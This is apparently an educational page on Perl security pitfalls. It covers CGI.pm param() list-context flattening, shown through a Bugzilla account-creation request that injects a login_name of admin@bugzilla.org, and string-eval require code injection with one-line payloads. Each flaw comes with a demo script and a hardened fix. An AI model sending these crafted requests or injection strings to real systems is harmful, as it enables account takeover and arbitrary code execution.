Perl

CGI

Lists

CGI.pm's param(), when called in list context on a parameter that appears more than once in the request (e.g., index.cgi?foo=1&foo=2&bar=a&bar=b), returns a list of all of that parameter's values rather than a single string.

When a list is used as a value inside a hash constructor, Perl flattens it into the surrounding key/value sequence, so the extra elements become new keys and values:

    use strict;
    use warnings;
    use Data::Dumper;
    $Data::Dumper::Sortkeys = 1;

    my @list = ('f', 'lol', 'wat');
    my $hash = { 'a' => 'b', 'c' => 'd', 'e' => @list };
    print Dumper($hash);
    # 'e' pairs with 'f', and 'lol' => 'wat' becomes a brand-new key/value pair:
    # { 'a' => 'b', 'c' => 'd', 'e' => 'f', 'lol' => 'wat' }

In the example below, $cgi->param('realname') is evaluated inside an anonymous hash constructor, i.e. in list context, so sending realname several times turns it into a list that is flattened into the constructor's key/value sequence. An attacker who controls the values can therefore inject a second login_name key; because a later key in a hash constructor overrides an earlier one, this overwrites the login_name that the application set. The fix is to force scalar context (scalar $cgi->param('realname')) so that at most one value can ever reach the constructor.

Example:

Vulnerable call (param() runs in list context):

    my $otheruser = Bugzilla::User->create({
        login_name    => $login_name,
        realname      => $cgi->param('realname'),   # list context inside {...}
        cryptpassword => $password,
    });

Crafted request, with realname repeated so that its values form the pairs realname => 'Lolzor', login_name => 'admin@bugzilla.org':

    a=confirm_new_account&t=[REGISTRATION_TOKEN]&passwd1=Password1!&passwd2=Password1!&realname=Lolzor&realname=login_name&realname=admin@bugzilla.org

Effective call after flattening (the second login_name wins):

    my $otheruser = Bugzilla::User->create({
        login_name    => $login_name,
        realname      => 'Lolzor',
        login_name    => 'admin@bugzilla.org',
        cryptpassword => $password,
    });
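The following stand-alone script is an added example, not Bugzilla's code or the page's own; it reproduces both the list flattening from the Lists section and the login_name override above without needing CGI.pm installed. The hypothetical parse_query and param routines stand in for CGI.pm: param() returns every value of a repeated key in list context and only the first in scalar context, which is the behaviour the attack relies on. The query string is constructed from the request above with a placeholder token, and '<hash>' stands in for the password hash. build_user has the vulnerable shape; build_user_safe is the hardened version that forces scalar context.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;
$Data::Dumper::Sortkeys = 1;
$Data::Dumper::Indent   = 1;

# Constructed request body: the crafted query string from the example above,
# with a placeholder registration token.
my $query = 'a=confirm_new_account&t=TOKEN&passwd1=Password1!&passwd2=Password1!'
          . '&realname=Lolzor&realname=login_name&realname=admin@bugzilla.org';

# Hypothetical stand-in for CGI.pm's parser: "k=v&k=v" -> { k => [values] }.
sub parse_query {
    my ($qs) = @_;
    my %params;
    for my $pair (split /&/, $qs) {
        my ($k, $v) = split /=/, $pair, 2;
        push @{ $params{$k} }, $v;
    }
    return \%params;
}

# Mimics CGI::param(): all values in list context, first value in scalar context.
sub param {
    my ($params, $name) = @_;
    my @values = @{ $params->{$name} || [] };
    return wantarray ? @values : $values[0];
}

# Vulnerable: param() sits inside a hash constructor, so it is called in list
# context. The three realname values flatten into
#   realname => 'Lolzor', login_name => 'admin@bugzilla.org'
# and the second login_name key overrides the first.
sub build_user {
    my ($params, $login_name) = @_;
    return {
        login_name    => $login_name,
        realname      => param($params, 'realname'),
        cryptpassword => '<hash>',
    };
}

# Hardened: scalar forces scalar context, so exactly one value is returned
# no matter how many times realname appears in the request.
sub build_user_safe {
    my ($params, $login_name) = @_;
    return {
        login_name    => $login_name,
        realname      => scalar param($params, 'realname'),
        cryptpassword => '<hash>',
    };
}

my $params = parse_query($query);
print "vulnerable: ", Dumper(build_user($params, 'victim@example.com'));
print "hardened:   ", Dumper(build_user_safe($params, 'victim@example.com'));
```

Running it prints login_name => 'admin@bugzilla.org' for the vulnerable builder and login_name => 'victim@example.com' with realname => 'Lolzor' for the hardened one. Recent CGI.pm releases (4.08 and later) also emit a "CGI::param called in list context" warning at exactly this kind of call site, which is worth enabling in logs when auditing older Perl web code.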

Code Injection

Code injection through a string eval of require: when a caller-supplied module name is interpolated into eval "require $module;", everything after the name is compiled and executed as Perl, not treated as part of the name.

Sample Code:

    package Some::Loader;
    use strict;
    use warnings;

    sub import {
        my $class = shift;
        for my $module (@_) {
            # String eval: $module is interpolated into Perl source, so any
            # text that is not a bare module name runs as code.
            eval "require $module;";
        }
    }

    1;

Sample Exploit:

    perl -MSome::Loader='vars; exit' -E 'say "Hello, world!"'

The -M switch expands to use Some::Loader 'vars; exit', so import() evaluates require vars; exit; and the process exits before the say statement runs. Any Perl statement can be substituted for exit.
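The script below is an added example (not code from the page or from any real project) that runs the vulnerable loader beside a hardened one. Safe::Loader is a hypothetical name: it accepts only syntactically valid package names and then calls require with a file path, which is looked up in @INC and never compiled as Perl source. The driver calls import() directly with the same kind of payload the -M one-liner delivers, using a benign assignment instead of exit so the script keeps running and can show that the injected code really executed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Vulnerable loader from the page: the argument is interpolated into a
# string eval, so "vars; <anything>" runs <anything> as Perl.
package Some::Loader;
sub import {
    my $class = shift;
    eval "require $_;" for @_;
}

# Hardened loader (hypothetical): validate, then require a file path.
package Safe::Loader;
sub import {
    my $class = shift;
    for my $module (@_) {
        # Only bareword package names: Foo, Foo::Bar, Foo::Bar_1.
        die "Safe::Loader: invalid module name '$module'\n"
            unless $module =~ /\A[A-Za-z_]\w*(?:::\w+)*\z/;
        # require with a string argument searches @INC for this file; the
        # string is never treated as Perl code.
        (my $file = "$module.pm") =~ s{::}{/}g;
        require $file;
    }
}

package main;

# Injection through the vulnerable loader: a payload that sets a variable
# instead of calling exit, so we can observe that it ran.
Some::Loader->import('vars; $main::injected = "yes"');
print "Some::Loader executed injected code: ", $main::injected // 'no', "\n";

# The same style of payload against the hardened loader is rejected before
# anything is evaluated; a genuine module name still loads.
for my $arg ('strict', 'vars; exit', 'Some::Module; system("id")') {
    my $ok = eval { Safe::Loader->import($arg); 1 };
    printf "Safe::Loader %-28s => %s", "'$arg'", $ok ? "loaded\n" : "rejected: $@";
}
```

Expected output is "Some::Loader executed injected code: yes" followed by 'strict' being loaded and both injected arguments being rejected with "invalid module name". Module::Load from core behaves similarly for the require step, but the explicit allow-list regex is what guarantees a reviewer can see exactly which strings are accepted.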